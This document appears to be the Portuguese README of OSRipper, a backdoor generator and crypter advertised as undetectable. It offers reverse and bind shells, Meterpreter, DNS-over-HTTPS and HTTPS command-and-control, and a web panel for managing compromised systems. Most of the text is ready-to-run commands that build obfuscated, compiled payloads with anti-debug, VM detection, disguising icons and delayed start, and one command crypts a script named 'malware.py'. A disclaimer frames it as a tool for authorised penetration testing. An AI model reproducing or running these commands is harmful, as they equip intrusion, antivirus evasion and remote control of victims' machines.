
Framework de Backdoor e Crypter multiplataforma com evasão de AV e webUI leve integrada

Gerador de payload e crypter avançado multiplataforma com capacidades FUD
Funcionalidades • Início Rápido • Interface Web • Tipos de Payload • Documentação
OSRipper é um gerador de backdoors e crypter sofisticado, totalmente indetectável (FUD), projetado para testes de penetração autorizados e operações de equipe vermelha. Apresenta técnicas avançadas de evasão, múltiplos tipos de payload e uma interface C2 moderna baseada na web para gerenciar sistemas comprometidos.
| Tipo de Payload | Descrição | Caso de Uso |
|---|---|---|
| Bind Shell | Abre uma porta na máquina alvo | Acesso direto quando conexões reversas estão bloqueadas |
| Reverse TCP Meterpreter | Conexão reversa criptografada com SSL/TLS | Teste de penetração padrão |
| DNS-over-HTTPS C2 | C2 furtivo baseado em DoH | Bypass de restrições de rede |
| HTTPS C2 | C2 HTTPS com fixação de certificado | Canal C2 seguro e autenticado |
| Payload Estagiado | Entrega web em múltiplos estágios | Implantação furtiva aprimorada |
| Crypter de Código Personalizado | Ofusca qualquer script Python | Criptografia de payload personalizada |
# Clonar repositório
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Instalar dependências
pip3 install -r requirements.txt
# Instalar pacote
pip3 install -e .
Importante — execute a configuração para funcionalidades opcionais (ngrok, compilação binária):
Em muitos sistemas (especialmente Linux com ambiente Python gerenciado externamente), você deve executar a configuração integrada para que as dependências opcionais sejam instaladas no venv do OSRipper. Faça isso uma vez após a instalação:
osripper-cli setup
Isso cria ~/.local/share/osripper/venv, instala pyngrok, nuitka e sandboxed lá, e todas as execuções posteriores de osripper / osripper-cli os usarão automaticamente. Sem isso, --ngrok e --compile solicitarão que você execute a configuração. Use osripper-cli setup --system somente se preferir uma instalação pip de sistema/usuário em vez do venv.
Modo Interativo:
osripper
# ou
python3 -m osripper
Linha de Comando:
# Gerar reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Gerar payload DoH C2
osripper-cli doh -d example.com --obfuscate --compile
Interface Web:
# Iniciar servidor C2 com interface web
python -m osripper.c2.server example.com --port 5000
# Acessar painel em http://localhost:5000
OSRipper inclui uma interface C2 moderna baseada na web para gerenciar sistemas comprometidos.
# Uso básico
python -m osripper.c2.server example.com
# Com HTTPS
python -m osripper.c2.server example.com --https
# Porta personalizada
python -m osripper.c2.server example.com --port 8080
# Com certificado personalizado
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
Quando o servidor estiver em execução, acesse o painel em:
http://localhost:5000https://localhost:5000 (se ativado)Abre uma porta na máquina alvo e aguarda conexões.
osripper-cli bind -p 4444 --obfuscate --compile
Conexão:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
Conexão reversa criptografada com SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
Canal C2 furtivo usando o protocolo DNS-over-HTTPS. Contorna muitas restrições de rede.
# Gerar payload
osripper-cli doh -d example.com --obfuscate --compile
# Iniciar servidor C2
python -m osripper.c2.server example.com
Funcionalidades:
C2 HTTPS segura com fixação de certificado para autenticação.
# Gerar payload (via interface web ou linha de comando)
# Iniciar servidor C2 com HTTPS
python -m osripper.c2.server example.com --https
# Obter impressão digital do certificado
curl http://localhost:5000/api/cert-fingerprint
Funcionalidades:
Entrega web em múltiplos estágios para furtividade aprimorada.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
Ofusca e criptografa qualquer script Python.
osripper-cli custom --script meupayload.py --obfuscate --enhanced --compile
| Opção | Descrição |
|---|---|
--obfuscate | Ativar ofuscação em múltiplas camadas |
--enhanced | Ofuscação aprimorada (anti-debug, detecção de VM) |
--compile | Compilar para binário autônomo |
--icon CAMINHO | Ícone personalizado para o binário compilado |
--delay | Adicionar atraso aleatório na inicialização (5–15 segundos) |
--output, -o NOME | Nome do arquivo de saída |
--quiet, -q | Modo silencioso (saída mínima) |
# Reverse shell completo
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# DoH C2 com todas as funcionalidades
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# Criptografia de script personalizado
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# Usando ngrok para IP dinâmico
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

┌─────────────────┐
│ Binário │
│ Gerado │
└─────────────────┘
│
│ Executar
▼
┌──────────────────┐
│ Dropper │
│ Ofuscado │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ SERVIDOR C2 │
│ (Interface │
│ Web) │
│ │
└─────────────────┘
│
│ Comando/Resposta
▼
┌─────────────────┐
│ Agente │
│ Execução │
└─────────────────┘

# Gerar payload com ngrok
osripper-cli reverse --ngrok -p 4444
# Seguir as instruções para configurar o túnel
# Executar: ngrok tcp 4444
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /caminho/para/icone.ico
Ofuscação Padrão:
Ofuscação Aprimorada:
# Padrão
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Aprimorada
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced
# 1. Iniciar servidor C2 com HTTPS
python -m osripper.c2.server example.com --https
# 2. Obter impressão digital do certificado
curl http://localhost:5000/api/cert-fingerprint
# 3. Gerar payload com a impressão digital (via interface web)
# Ou usar a impressão digital na geração do payload
Aceitamos contribuições da comunidade de pesquisa em segurança!
git checkout -b feature/recursos-incrivel)git commit -m 'Adiciona recurso incrível')git push origin feature/recursos-incrivel)Agradecimentos especiais à comunidade de pesquisa em segurança e a estes projetos:
IMPORTANTE: Esta ferramenta é desenvolvida para fins educacionais e testes de penetração autorizados.
Os desenvolvedores não são responsáveis pelo uso indevido deste software. Os usuários devem cumprir todas as leis e regulamentos aplicáveis.